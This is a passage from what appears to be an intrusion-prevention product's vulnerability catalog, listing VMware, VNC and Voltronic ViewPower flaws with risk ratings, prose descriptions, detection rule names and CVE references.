https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-37085
Back to top

VMware-ESXi-Remote-Code-Execution-CVE-2021-21974

About this vulnerability: A vulnerability in VMware ESXi
Risk: High
First detected in: sgpkg-ips-1553-5242
Last changed: sgpkg-ips-1553-5242
Platform: Generic
Software: VMware ESXi
Type: Buffer Overflow
Description: A remote code execution vulnerability has been reported in the OpenSLP component of the VMWare ESXi server.
Situation: Generic_CS-VMware-ESXi-Remote-Code-Execution-CVE-2021-21974
References:
CVE-2021-21974
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21974
Back to top

VMware-Fusion-Guest-VM-Remote-Code-Execution

About this vulnerability: A vulnerability in VMWare Fusion
Risk: Moderate
First detected in: sgpkg-ips-1150-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: VMware Fusion
Type: Malfunction
Description: There has been reported a remote code execution vulnerability in VMWare Fusion. Opening a specially crafted website is required to exploit this vulnerability. Successful exploitation could lead in arbitrary code execution.
Situation: File-Text_VMware-Fusion-Guest-VM-Remote-Code-Execution
References:
CVE-2019-5514
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5514
Back to top

VMware-HCX-Listextensions-SQL-Injection

About this vulnerability: A vulnerability in VMWare HCX
Risk: Moderate
First detected in: sgpkg-ips-1844-5242
Last changed: sgpkg-ips-1844-5242
Platform: Generic
Software: VMWare HCX
Type: Input Validation
Description: Improper input validation in the listExtensions method in VMWare HCX causes an SQL injection vulnerability. A successful exploitation allows an attacker to execute arbitrary SQL on the target server.
Situation: HTTP_CRL-VMware-HCX-Listextensions-SQL-Injection
References:
CVE-2024-38814
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-38814
Back to top

VMware-Hyperic-HQ-Groovy-Script-Console-Java-Execution

About this vulnerability: A vulnerability in VMware Hyperic HQ
Risk: Moderate
First detected in: sgpkg-ips-569-5211
Last changed: sgpkg-ips-1588-5242
Platform: Generic
Software: VMware Hyperic HQ
Type: Code Injection
Description: The Groovy script console in VMware Hyperic HQ 4.6.6 allows remote authenticated administrators to execute arbitrary code via a Runtime.getRuntime().exec call
Situation: HTTP_CRL-VMware-Hyperic-HQ-Groovy-Script-Console-Java-Execution
References:
CVE-2013-6366
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6366
OSVDB-98804
http://www.osvdb.org/98804
Back to top

VMware-IntraProcessLogging-DLL-ActiveX-File-Overwrite

About this vulnerability: VMware IntraProcessLogging.dll ActiveX control allows arbitrary file overwriting
Risk: Moderate
First detected in: sgpkg-ips-172-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: EMC VMware
Type: Malfunction
Description: Certain versions of the IntraProcessLogging.dll ActiveX component shipped with VMware products contain a vulnerability which allows remote attackers to overwrite arbitrary files on the vulnerable host. The attack can be executed by tricking a user on the vulnerable host into viewing a malicious webpage with Internet Explorer.
Situation: HTTP_SS-VMware-IntraProcessLogging-DLL-ActiveX-File-Overwrite
File-Text_VMware-IntraProcessLogging-DLL-ActiveX-File-Overwrite
References:
CVE-2007-4059
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4059
BID-25110
http://www.securityfocus.com/bid/25110
Back to top

VMware-Multiple-Products-Configurator-Command-Injection

About this vulnerability: A vulnerability in VMWare Identity Manager
Risk: High
First detected in: sgpkg-ips-1311-5242
Last changed: sgpkg-ips-1311-5242
Platform: Generic
Software: VMware Identity Manager; VMware Identity Manager Connector; VMware WorkStation One Access; VMware WorkStation One Access Connector; VMware Cloud Foundation; VMware vRealize Suite Lifecycle Manager
Type: Input Validation
Description: A command injection vulnerability has been reported in multiple VMware products. The vulnerability is due to improper validation of user input in the administrative configurator. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in arbitrary command execution on the target server.
Situation: HTTP_CRL-VMware-Multiple-Products-Configurator-Command-Injection
References:
CVE-2020-4006
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-4006
Back to top

VMware-OVF-Tool-Format-String-Vulnerability

About this vulnerability: A vulnerability in VMware OVF Tool
Risk: Moderate
First detected in: sgpkg-ips-515-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: EMC VMware
Type: Format String
Description: A format string vulnerability has been reported in VMware OVF Tool. The vulnerability is caused by insufficient sanitization when processing OVF files. By enticing a target user to open a crafted OVF file, a remote attacker can exploit this vulnerability to execute arbitrary code in the security context of the current user.
Situation: File-TextId_VMware-OVF-Tool-Format-String-Vulnerability
References:
CVE-2012-3569
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3569
BID-56468
http://www.securityfocus.com/bid/56468
OSVDB-87117
http://www.osvdb.org/87117
Back to top

VMware-Remote-Console-HOST-And-MOID-Format-String-Code-Execution

About this vulnerability: A code execution vulnerability in VMware Remote Console
Risk: High
First detected in: sgpkg-ips-314-4219
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: EMC VMware Remote Console
Type: Format String
Description: There is a remote code execution vulnerability in VMware Remote Console. By enticing a target user to visit a malicious web page, an attacker can execute arbitrary code with the privileges of the logged in user.
Situation: HTTP_SS-VMware-Remote-Console-HOST-And-MOID-Format-String-Code-Execution
File-Text_VMware-Remote-Console-HOST-And-MOID-Format-String-Code-Execution
References:
CVE-2009-3732
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3732
BID-39396
http://www.securityfocus.com/bid/39396
OSVDB-63605
http://www.osvdb.org/63605
Back to top

VMware-SD-WAN-Edge-Command-Injection-Vulnerability-CVE-2018-6961

About this vulnerability: An attempt to exploit a vulnerability in VMware SD-WAN Edge detected
Risk: High
First detected in: sgpkg-ips-1659-5242
Last changed: sgpkg-ips-1659-5242
Platform: Generic
Software: VMware SD-WAN Edge
Type: Input Validation
Description: VMware NSX SD-WAN Edge by VeloCloud prior to version 3.1.0 contains a command injection vulnerability in the local web UI component. This component is disabled by default and should not be enabled on untrusted networks. Successful exploitation of this issue could result in remote code execution.
Situation: HTTP_CRL-VMware-SD-WAN-Edge-Command-Injection-Vulnerability-CVE-2018-6961
References:
CVE-2018-6961
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6961
Back to top

VMware-Server-Directory-Traversal

About this vulnerability: A VMware Server Directory Traversal vulnerability
Risk: Moderate
First detected in: sgpkg-ips-800-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: EMC VMware Server
Type: Directory Traversal
Description: A vulnerability in EMC VMware Server, versions 1.x before 1.0.10 build 203137 and 2.x before 2.0.2 build 203138 on Linux, VMware ESXi 3.5, and VMware ESX 3.0.3 and 3.5, which allows remote attackers to read arbitrary files via a directory traversal.
Situation: HTTP_CSU-VMware-Server-Directory-Traversal
References:
CVE-2009-3733
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3733
BID-36842
http://www.securityfocus.com/bid/36842
OSVDB-59440
http://www.osvdb.org/59440
Back to top

VMware-Server-Isapi-Extension-Remote-Denial-Of-Service

About this vulnerability: A denial of service vulnerability in VMWare Server
Risk: Moderate
First detected in: sgpkg-ips-174-2032
Last changed: sgpkg-ips-1589-5242
Platform: Generic
Software: EMC VMware Server
Type: Input Validation
Description: There is a vulnerability in the ISAPI extension provided by VMware Server to extend support to IIS for running Perl scripts. By supplying overly large data to the ISAPI extension iisperl.dll in a POST request, a remote attacker can terminate the IIS service and create a Denial of Service condition.
Situation: HTTP_CS-VMware-Server-Isapi-Extension-Remote-Denial-Of-Service
References:
CVE-2008-3697
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3697
BID-30935
http://www.securityfocus.com/bid/30935
Back to top

VMware-Spring-Cloud-Data-Flow-Skipper-Server-Directory-Traversal

About this vulnerability: A vulnerability in VMWare Spring Cloud Data Flow
Risk: High
First detected in: sgpkg-ips-1784-5242
Last changed: sgpkg-ips-1784-5242
Platform: Generic
Software: VMWare Spring Cloud Data Flow
Type: Directory Traversal
Description: A directory traversal vulnerability has been reported in VMware Spring Cloud Data Flow. The vulnerability is due to improper validation of file paths used in package uploads to the Skipper server. A remote, authenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in arbitrary file creation or, in the worst case, remote code execution in the context of the vulnerable service.
Situation: HTTP_CRL-VMware-Spring-Cloud-Data-Flow-Skipper-Server-Directory-Traversal
References:
CVE-2024-22263
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-22263
Back to top

VMware-Spring-Cloud-Data-Flow-Skipper-Server-YAML-Insecure-Deserialization

About this vulnerability: A vulnerability in VMWare Spring Cloud Data Flow
Risk: High
First detected in: sgpkg-ips-1790-5242
Last changed: sgpkg-ips-1790-5242
Platform: Generic
Software: VMWare Spring Cloud Data Flow
Type: Input Validation
Description: An insecure deserialization vulnerability has been reported in VMware Spring Cloud Data Flow. This vulnerability is due to insufficient validation of user data in YAML files in user uploaded packages to the Skipper Server. Successfully exploiting this vulnerability could result in arbitrary remote code execution in the context of the vulnerable service without any prior authentication.
Situation: File-Text_VMware-Spring-Cloud-Data-Flow-Skipper-Server-YAML-Insecure-Deserialization
References:
CVE-2024-37084
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-37084
Back to top

VMware-Spring-Cloud-Gateway-Spel-Code-Injection

About this vulnerability: A vulnerability in VMWare Spring Cloud Gateway
Risk: Moderate
First detected in: sgpkg-ips-1446-5242
Last changed: sgpkg-ips-1446-5242
Platform: Generic
Software: VMWare Spring Cloud Gateway
Type: Input Validation
Description: Improper validation of user-provided SpEL expressions causes a code injection vulnerability in VMWare Spring Cloud Gateway. A successful exploit allows a remote attacker to execute arbitrary code on the target system.
Situation: HTTP_CRL-VMware-Spring-Cloud-Gateway-Spel-Code-Injection
References:
CVE-2022-22947
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22947
Back to top

VMware-Springsource-Spring-Framework-Class.classloader-Remote-Code-Execution

About this vulnerability: A vulnerability in VMware SpringSource Spring Framework
Risk: Moderate
First detected in: sgpkg-ips-414-4219
Last changed: sgpkg-ips-1730-5242
Platform: Generic
Software: VMware SpringSource
Type: Malfunction
Description: A remote code execution vulnerability exists in the VMware SpringSource Spring Framework. The vulnerability is due to a design weakness in the web application framework. A remote attacker can leverage this weakness by sending a crafted HTTP request to a target system. In attack scenarios where code execution is successful the behaviour of the affected server depends entirely on the intention of the attacker-controlled code. This malicious code would be executed within the privileges of the affected service. Unsuccessful attack attempts may cause the targeted web application to stop responding or enter into an error state, resulting in a denial of service condition.
Situation: HTTP_CRL-Apache-Struts-Multiple-Classloaders-Security-Bypass
References:
CVE-2010-1622
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1622
BID-40954
http://www.securityfocus.com/bid/40954
Back to top

VMware-User-Credential-Verification-Request-To-Authentication-Server

About this vulnerability: A VMware Identity Manager user credential verification request to an authentication server
Risk: Low
First detected in: sgpkg-ips-1472-5242
Last changed: sgpkg-ips-1478-5242
Platform: Any Operating System
Software: VMware Workspace ONE; VMware Identity Manager
Type: Insecure Configuration
Description: A VMware Identity Manager user credential verification request to an authentication server was detected. VMware Workspace ONE Access, VMware Identity Manager, and vRealize Automation have been reported to contain an authentication bypass vulnerability CVE-2022-22972, which allows an attacker to direct the verification request to an arbitrary destination. This situation can be used in a to limit the verification requests to only trusted servers.
Situation: HTTP_CRL-VMware-User-Credential-Verification-Request-To-Authentication-Server
References:
CVE-2022-22972
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22972
Back to top

VMware-Vcenter-Arbitrary-File-Read

About this vulnerability: An attempt to exploit a vulnerability in VMware vCenter detected
Risk: High
First detected in: sgpkg-ips-1410-5242
Last changed: sgpkg-ips-1410-5242
Platform: Generic
Software: VMware vCenter Server
Type: Malfunction
Description: An attempt to exploit a vulnerability in VMware vCenter detected.
Situation: HTTP_CSU-VMware-Vcenter-Arbitrary-File-Read
Back to top

VMware-Vcenter-Chargeback-Manager-Remote-Code-Execution

About this vulnerability: Remote Code Execution vulnerability in VMware Vcenter
Risk: High
First detected in: sgpkg-ips-596-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: VMware vCenter Chargeback Manager
Type: Script Injection
Description: An unauthenticated attacker may pass malicious .jsp source code files through an unsafe file upload function and execute them remotely in the target machine.
Situation: HTTP_CS-VMware-Vcenter-Chargeback-Manager-Remote-Code-Execution
References:
CVE-2013-3520
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3520
Back to top

VMware-Vcenter-Server-Authentication-Pointer-Out-of-Range-CVE-2023-20894

About this vulnerability: A vulnerability in VMWare vCenter Server
Risk: High
First detected in: sgpkg-ips-1625-5242
Last changed: sgpkg-ips-1658-5242
Platform: Generic
Software: VMware vCenter Server; VMware Cloud Foundation
Type: Input Validation
Description: A use of out-of-range pointer offset vulnerability has been reported for VMware vCenter Server. The vulnerability is due to improper validation of the user-supplied data in DCERPC packets. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted RPC request to the target server. Successfully exploiting this vulnerability could result in memory corruption or memory access error, which could lead to code execution in the worse case.
Situation: Generic_CS-VMware-Vcenter-Server-Authentication-Pointer-Out-of-Range-CVE-2023-20894
References:
CVE-2023-20894
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-20894
Back to top

VMware-Vcenter-Server-Directory-Service-Authentication-Bypass

About this vulnerability: A vulnerability in VMware vCenter Server
Risk: High
First detected in: sgpkg-ips-1268-5242
Last changed: sgpkg-ips-1552-5242
Platform: Generic
Software: VMware vCenter Server
Type: Configuration Error
Description: There exists a vulnerability in VMWare vCenter Server, versions prior to 6.7 update u3f, which allows remote attackers to gain sensitive information or add new administrative accounts, due to the incorrect implementation of access controls.
Situation: LDAP_CS-VMware-Vcenter-Server-Directory-Service-Authentication-Bypass
LDAP_CS-VMware-Vcenter-Server-Directory-Service-Authentication-Bypass-2
References:
CVE-2020-3952
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3952
Back to top

VMware-Vcenter-Server-Integer-Underflow-CVE-2024-37079

About this vulnerability: A vulnerability in VMWare vCenter Server
Risk: Critical
First detected in: sgpkg-ips-1763-5242
Last changed: sgpkg-ips-1763-5242
Platform: Generic
Software: VMware vCenter Server; VMware Cloud Foundation
Type: Integer Overflow
Description: An integer underflow vulnerability has been reported for VMware vCenter Server. The vulnerability is due to lack of validation of the calculated response header size used in subtraction. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted DCERPC packet to the target server. Successfully exploiting this vulnerability could lead to a heap buffer overflow, which could result in execution of arbitrary code in the context of the vulnerable service.
Situation: Generic_TCP-VMware-Vcenter-Server-Integer-Underflow-CVE-2024-37079
References:
CVE-2024-37079
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-37079
Back to top

VMware-Vcenter-Server-Jmx-Remote-Code-Execution

About this vulnerability: A vulnerability in VMWare vCenter Server
Risk: High
First detected in: sgpkg-ips-699-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: VMware vCenter Server
Type: Malfunction
Description: There exists a code execution vulnerability in VMware vCenter Server. A remote attacker can use this to execute arbitrary code with SYSTEM privileges.
Situation: Generic_CS-VMware-Vcenter-Server-Jmx-Remote-Code-Execution
References:
CVE-2015-2342
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2342
Back to top

VMware-Vcenter-Server-Out-Of-Bounds-Write-CVE-2024-38812

About this vulnerability: A vulnerability in VMWare vCenter Server
Risk: Critical
First detected in: sgpkg-ips-1818-5242
Last changed: sgpkg-ips-1818-5242
Platform: Generic
Software: VMware vCenter Server
Type: Input Validation
Description: A pre-authenticated out-of-bounds write vulnerability has been reported for VMware vCenter Server. The vulnerability is due to insufficient validation of the metadata of the array RPC call arguments. Successfully exploiting this vulnerability could result in execution of arbitrary code in the context of the vulnerable application.
Situation: MSRPC-TCP_CPS-VMware-Vcenter-Server-Out-Of-Bounds-Write-CVE-2024-38812
References:
CVE-2024-38812
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-38812
Back to top

VMware-Vcenter-Server-Psc-Dataaccesscontroller-Insecure-Deserialization

About this vulnerability: A vulnerability in VMWare vCenter Server
Risk: High
First detected in: sgpkg-ips-1538-5242
Last changed: sgpkg-ips-1538-5242
Platform: Generic
Software: VMware vCenter Server
Type: Input Validation
Description: An insecure deserialization vulnerability has been reported in VMware vCenter Server. The vulnerability is due to lack of input validation of an encoded constraint sent to the DataAccessController endpoint of the PSC (Platform services controller). A remote, authenticated attacker can exploit this vulnerability by sending a malicious request to the target server. Successfully exploiting this vulnerability could result in remote code execution with privileges of the root user.
Situation: HTTP_CSU-VMware-Vcenter-Server-Psc-Dataaccesscontroller-Insecure-Deserialization
References:
CVE-2022-31680
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31680
Back to top

VMware-Vcenter-Server-Remote-Code-Execution

About this vulnerability: A vulnerability in VMware vCenter Server
Risk: Moderate
First detected in: sgpkg-ips-1362-5242
Last changed: sgpkg-ips-1362-5242
Platform: Generic
Software: VMware vCenter Server; VMware Cloud Foundation
Type: Input Validation
Description: There exists a remote code execution vulnerability in VMware vCenter Server. Successful exploitation could lead in arbitrary command execution.
Situation: HTTP_CRL-VMware-Vcenter-Server-Remote-Code-Execution
References:
CVE-2021-21985
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21985
Back to top

VMware-Vcenter-Server-Remote-Code-Execution-CVE-2021-21972

About this vulnerability: A vulnerability in VMware vCenter Server
Risk: High
First detected in: sgpkg-ips-1324-5242
Last changed: sgpkg-ips-1606-5242
Platform: Generic
Software: VMware vCenter Server; VMware Cloud Foundation
Type: Input Validation
Description: There exists a remote code execution vulnerability in vSphere Client component of VMware vCenter. A successful exploitation could allow the attacker to execute arbitrary code with unrestricted privileges on the operating system that hosts vCenter Server.
Situation: HTTP_CS-VMware-Vcenter-Server-Remote-Code-Execution-CVE-2021-21972
File-Binary_Suspicious-Long-Name-In-Gnu-Tar-Archive
File-Binary_Path-Traversal-Via-Tar-Archive
References:
CVE-2021-21972
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21972
Back to top

VMware-Vcenter-Server-Ssooverrestverifierutil-Denial-Of-Service

About this vulnerability: A vulnerability in VMWare vCenter Server
Risk: High
First detected in: sgpkg-ips-1544-5242
Last changed: sgpkg-ips-1544-5242
Platform: Generic
Software: VMware Cloud Foundation; VMware vCenter Server
Type: Resource Starvation
Description: A denial of service vulnerability has been reported for VMware vCenter Server. This vulnerability is due to improper validation of the value stored in the TokenParts header in HTTP GET requests to vulnerable endpoints. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request with a large value in the TokenParts header to the vulnerable endpoints. Successfully exploiting this vulnerability could result in denial of service conditions on the target server.
Situation: HTTP_CSH-VMware-Vcenter-Server-Ssooverrestverifierutil-Denial-Of-Service
References:
CVE-2022-31698
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31698
Back to top

VMware-Vcenter-Update-Manager-Directory-Traversal

About this vulnerability: A VMware Vcenter Update Manager Directory Traversal vulnerability.
Risk: Moderate
First detected in: sgpkg-ips-712-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: VMware vCenter Server
Type: Directory Traversal
Description: A vulnerability in VMware vCenter Server, versions 4.0 before Update 4 and 4.1 before Update 2, which allows remote attackers to read arbitrary files via directory traversal.
Situation: HTTP_CSU_VMware-Vcenter-Update-Manager-Directory-Traversal
References:
CVE-2011-4404
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4404
Back to top

VMware-Vielib-ActiveX-CreateProcess-Command-Execution

About this vulnerability: VMware vielib.dll ActiveX control allows arbitrary command execution
Risk: Moderate
First detected in: sgpkg-ips-172-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: EMC VMware
Type: Malfunction
Description: Certain versions of the vielib.dll in VMware contain an ActiveX control vulnerable to an arbitrary command execution vulnerability. The vulnerability allows remote attackers to execute arbitrary commands on a vulnerable host, and it can be exploited by tricking a user on the vulnerable host into viewing a malicious webpage with Internet Explorer.
Situation: HTTP_SS-VMware-Vielib-ActiveX-CreateProcess-Command-Execution
File-Text_VMware-Vielib-ActiveX-CreateProcess-Command-Execution
References:
CVE-2007-4155
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4155
BID-25131
http://www.securityfocus.com/bid/25131
Back to top

VMware-View-Planner-Logupload-Directory-Traversal

About this vulnerability: A vulnerability in VMWare View Planner
Risk: Moderate
First detected in: sgpkg-ips-1332-5242
Last changed: sgpkg-ips-1332-5242
Platform: Generic
Software: VMWare View Planner
Type: Input Validation
Description: Improper validation of the payload of HTTP requests to the logupload endpoint causes a directory traversal vulnerability in VMWare View Planner. A successful exploit allows an attacker to execute arbitrary code on the target with root privileges.
Situation: HTTP_CRL-VMware-View-Planner-Logupload-Directory-Traversal
References:
CVE-2021-21978
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21978
Back to top

VMware-VNC-Vmwdynresolution-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in VMWare ESXi
Risk: Moderate
First detected in: sgpkg-ips-1039-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: EMC VMware
Type: Buffer Overflow
Description: Improper processing of VNC VMWDynResolution requests causes a heap buffer overflow vulnerability in VMWare. Successful exploitation allows arbitrary code execution and in some cases with lesser success, a denial of service condition can be caused.
Situation: Generic_CS-VMware-VNC-Vmwdynresolution-Heap-Buffer-Overflow
References:
CVE-2017-4933
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-4933
Back to top

VMware-Vrealize-Log-Insight-Directory-Traversal-Vulnerability-CVE-2022-31706

About this vulnerability: An attempt to exploit a vulnerability in VMware-vRealize Log Insight detected
Risk: High
First detected in: sgpkg-ips-1552-5242
Last changed: sgpkg-ips-1606-5242
Platform: Generic
Software: VMware vRealize Log Insight
Type: Input Validation
Description: The vRealize Log Insight contains a Directory Traversal Vulnerability. An unauthenticated, malicious actor can inject files into the operating system of an impacted appliance which can result in remote code execution.
Situation: File-Binary_Path-Traversal-Via-Tar-Archive
References:
CVE-2022-31706
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31706
Back to top

VMware-Vrealize-Operations-Manager-API-Certificate-Upload-Directory-Traversal

About this vulnerability: A vulnerability in VMWare Cloud Foundation
Risk: Moderate
First detected in: sgpkg-ips-1343-5242
Last changed: sgpkg-ips-1343-5242
Platform: Generic
Software: VMware Cloud Foundation; VMWare vRealize Operations Manager; VMware vRealize Suite Lifecycle Manager
Type: Directory Traversal
Description: There exists a directory traversal vulnerability in multiple VMware products. Successful exploitation could result in arbitrary file creation.
Situation: HTTP_CRL-VMware-Vrealize-Operations-Manager-API-Certificate-Upload-Directory-Traversal
References:
CVE-2021-21983
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21983
Back to top

VMware-Vrealize-Operations-Manager-API-Server-Side-Request-Forgery

About this vulnerability: A vulnerability in VMWare Cloud Foundation
Risk: Moderate
First detected in: sgpkg-ips-1340-5242
Last changed: sgpkg-ips-1340-5242
Platform: Generic
Software: VMware Cloud Foundation; VMWare vRealize Operations Manager; VMware vRealize Suite Lifecycle Manager
Type: Malfunction
Description: There exists a server side request forgery vulnerability in multiple products of VMware. Successful exploitation could lead in credentials disclosure.
Situation: HTTP_CRL-VMware-Vrealize-Operations-Manager-API-Server-Side-Request-Forgery
References:
CVE-2021-21975
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21975
Back to top

VMware-Workspace-ONE-Access-VMSA-2022-0011-Exploit-Chain

About this vulnerability: A vulnerability in VMware Workspace ONE.
Risk: High
First detected in: sgpkg-ips-1587-5242
Last changed: sgpkg-ips-1587-5242
Platform: Linux
Software: VMware Workspace ONE
Type: Input Validation
Description: A vulnerability in VMware Workspace ONE which allows remote attackers to trigger the execution of a constructor defined in an arbitrary Java class with a controlled string argument by setting the socketFactory and socketFactoryArg properties.
Situation: HTTP_CRL-VMware-Workspace-ONE-Access-VMSA-2022-0011-Exploit-Chain
References:
CVE-2022-22957
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22957
Back to top

VMware-Workspace-One-Authentication-Bypass-CVE-2022-31656

About this vulnerability: A vulnerability in VMware Workspace ONE
Risk: High
First detected in: sgpkg-ips-1493-5242
Last changed: sgpkg-ips-1493-5242
Platform: Generic
Software: VMware Workspace ONE
Type: Malfunction
Description: An authentication bypass vulnerability has been reported in VMware Workspace ONE Access, Identity Manager, and vRealize Automation.
Situation: HTTP_CSU-VMware-Workspace-One-Authentication-Bypass-CVE-2022-31656
References:
CVE-2022-31656
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31656
Back to top

VMware-Workspace-One-Template-Injection-CVE-2022-22954

About this vulnerability: An attempt to exploit a vulnerability in VMware Workspace ONE detected
Risk: High
First detected in: sgpkg-ips-1456-5242
Last changed: sgpkg-ips-1456-5242
Platform: Generic
Software: VMware Workspace ONE
Type: Input Validation
Description: A server side template injection vulnerability has been reported in VMware Workspace ONE Access and Identity Manager. Successful exploitation could lead in arbitrary code execution.
Situation: HTTP_CRL-VMware-Workspace-One-Template-Injection-CVE-2022-22954
References:
CVE-2022-22954
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22954
Back to top

VMware-Workstation-ActiveX-Control-Vielib.dll-Command-Execution

About this vulnerability: Command execution vulnerability in VMware Workstation ActiveX Control
Risk: High
First detected in: sgpkg-ips-115-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: EMC VMware Workstation
Type: Code Injection
Description: VMware Workstation ActiveX Control has a command execution vulnerability due to insufficient data validation when processing the StartProcess method call. A remote attacker can exploit this vulnerability by enticing a user to visit a crafted web site, to compromise the vulnerable system.
Situation: HTTP_SS-VMware-Workstation-ActiveX-Control-Vielib.dll-Command-Execution
File-Text_VMware-Workstation-ActiveX-Control-Vielib.dll-Command-Execution
References:
CVE-2007-4058
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4058
BID-25118
http://www.securityfocus.com/bid/25118
Back to top

VMware-Workstation-ActiveX-Partition-Table-Delete

About this vulnerability: VMware Workstation ActiveX service allows partition table deletion
Risk: Moderate
First detected in: sgpkg-ips-172-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: EMC VMware Workstation
Type: Insecure Configuration
Description: Certain versions of the VMware Workstation allow remote attackers to clear the hard drive partition table by calling an ActiveX function. The attack can be executed by tricking a user on the vulnerable host into viewing a malicious webpage with Internet Explorer.
Situation: HTTP_SS-VMware-Workstation-ActiveX-Partition-Table-Delete-Exploit
File-Text_VMware-Workstation-ActiveX-Partition-Table-Delete-Exploit
Back to top

VNC-Usage

About this vulnerability: VNC usage detection.
Risk: Low
First detected in: sgpkg-ips-28-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: VNC
Type: Remote Control
Description: This vulnerability is referenced by fingerprints that detect VNC remote control connections. VNC can be used to remotely control graphical user interfaces, and unknown VNC servers inside a network may pose security risks.
Situation: Generic_VNC-Remote-Control-Connection
Back to top

Voipmonitor-SQL-Injection-CVE-2022-24260

About this vulnerability: A vulnerability in VoIPmonitor
Risk: High
First detected in: sgpkg-ips-1501-5242
Last changed: sgpkg-ips-1501-5242
Platform: Generic
Software: VoIPmonitor
Type: Input Validation
Description: An SQL injection vulnerability has been reported in the VoIPmonitor GUI. A remote attacker can use this vulnerability to obtain administrator privileges.
Situation: HTTP_CRL-Voipmonitor-SQL-Injection-CVE-2022-24260
References:
CVE-2022-24260
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24260
Back to top

Voltronic-Power-Viewpower-Getmodbuspassword-Information-Disclosure

About this vulnerability: A vulnerability in Voltronic Power ViewPower
Risk: Moderate
First detected in: sgpkg-ips-1701-5242
Last changed: sgpkg-ips-1701-5242
Platform: Generic
Software: Voltronic Power ViewPower Pro
Type: Malfunction
Description: A information disclosure vulnerability has been reported in Voltronic Power ViewPower. The vulnerability is due to exposing dangerous method getModbusPassword in the RMI service. A remote, unauthenticated attacker could exploit this vulnerability by sending RMI requests to the target server. Successful exploitation could result in password leak of ModBus communication.
Situation: Generic_CS-Voltronic-Power-Viewpower-Getmodbuspassword-Information-Disclosure
References:
CVE-2023-51587
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-51587
Back to top

Voltronic-Power-Viewpower-Pro-Automatchmac-Command-Injection

About this vulnerability: A vulnerability in Voltronic Power ViewPower Pro
Risk: High
First detected in: sgpkg-ips-1678-5242
Last changed: sgpkg-ips-1678-5242
Platform: Generic
Software: Voltronic Power ViewPower Pro
Type: Input Validation
Description: A command injection vulnerability has been reported in Voltronic ViewPower Pro. The vulnerability is due to improper validation of parameters when processing requests sent to autoMatchMac endpoint. A remote, unauthenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in command injection under the security context of SYSTEM.
Situation: HTTP_CRL-Voltronic-Power-Viewpower-Pro-Automatchmac-Command-Injection
References:
CVE-2023-51572
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-51572
Back to top

Voltronic-Power-Viewpower-Pro-Selectdevicelistby-SQL-Injection

About this vulnerability: A vulnerability in Voltronic Power ViewPower Pro
Risk: Moderate
First detected in: sgpkg-ips-1728-5242
Last changed: sgpkg-ips-1728-5242
Platform: Generic
Software: Voltronic Power ViewPower Pro
Type: Input Validation
